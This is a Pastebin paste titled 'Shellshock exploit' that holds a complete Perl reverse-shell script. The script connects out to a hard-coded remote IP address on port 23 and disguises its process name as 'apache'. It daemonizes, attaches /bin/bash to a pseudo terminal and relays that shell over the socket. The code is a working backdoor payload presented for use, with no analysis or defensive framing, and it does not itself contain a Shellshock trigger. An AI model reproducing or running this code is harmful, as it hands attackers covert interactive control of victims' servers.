Advertisement
Guest User

Shellshock exploit

a guest
Sep 25th, 2014
823
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.14 KB | None | 0 0
  1. #!/usr/bin/perl -w
  2.  
  3. use IO::Socket;
  4. use Fcntl;
  5.  
  6. # IOCTLs
  7. $TIOCGPTN = -2147199952;
  8. $TIOCSPTLCK = 1074025521;
  9. $EAGAIN=11;
  10.  
  11. print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
  12.  
  13. $HOST="72.167.37.182";
  14. $PORT="23";
  15.  
  16. $0="apache";
  17.  
  18. print "Connecting to $HOST:$PORT... ";
  19.  
  20. $sock = new IO::Socket::INET (
  21.     PeerAddr => $HOST,
  22.     PeerPort => $PORT,
  23.     Proto => 'tcp',
  24.     Blocking => 0,
  25. ) or die $!;
  26.  
  27. print "ok\nAllocatig pseudo terminal... ";
  28.  
  29. ## ptsname
  30. sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
  31. $tmp='';
  32. ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
  33. $pts = unpack('i', $tmp);
  34.  
  35. print "/dev/pts/$pts\nInitializing pseudo terminal... ";
  36.  
  37. ## grantpt not needed on devpts
  38.  
  39. ## unlockpt
  40. $unlock=pack('i', 0);
  41. ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
  42.  
  43. ## prepare daemonizing
  44. chdir '/' or die $!;
  45. open STDIN, '/dev/null' or die $!;
  46. umask 0;
  47.  
  48. print "ok\nForking shell thread...";
  49.  
  50. defined($pid = fork) or die $!;
  51. exit if $pid;
  52. defined($pid = fork) or die $!;
  53. if (!$pid) {
  54.     exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
  55.     exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
  56.     die $!;
  57.     exit;
  58. }        
  59.  
  60. print "ok\nHave fun!\n";
  61.  
  62. open STDOUT, '>>/dev/null' or die $!;
  63. open STDERR, '>>/dev/null' or die $!;
  64.  
  65. $pp = PTMX;
  66. $rin=$win=$ein='';
  67. vec($rin,fileno($pp),1) =1;
  68. vec($rin,fileno($sock),1) = 1;
  69.  
  70. select $sock;
  71. $|=1;
  72. select PTMX;
  73. $|=1;
  74. select STDOUT;
  75. $|=1;
  76. $finished=0;
  77.  
  78. sub forwarddata {
  79.     my ($from,$to) = @_;
  80.     while(1) {
  81.         $rv = sysread($from, $buff, 1024);
  82.         last if (!defined($rv) && $! == $EAGAIN);  
  83.         defined($rv) or die $!;
  84.         if ($rv == 0) { $finished = 1; last;}
  85.         while(length $buff > 0) {
  86.             $rv = syswrite($to, $buff, length $buff);
  87.             if (!defined($rv) && $! == $EAGAIN) {
  88.                 ## try again
  89.                 next;
  90.             }
  91.             defined($rv) or die $!;
  92.             last if ($rv == length $buff);
  93.             substr($buff,0,$rv) = '';
  94.         }
  95.     }
  96. }
  97.  
  98. while(! $finished) {
  99.     $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
  100.     die $! if ($nfound == -1);
  101.     forwarddata($pp,$sock);
  102.     last if $finished;
  103.     forwarddata($sock,$pp);
  104.     last if $finished;
  105. }
  106. close PTMX;
  107. close $sock;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement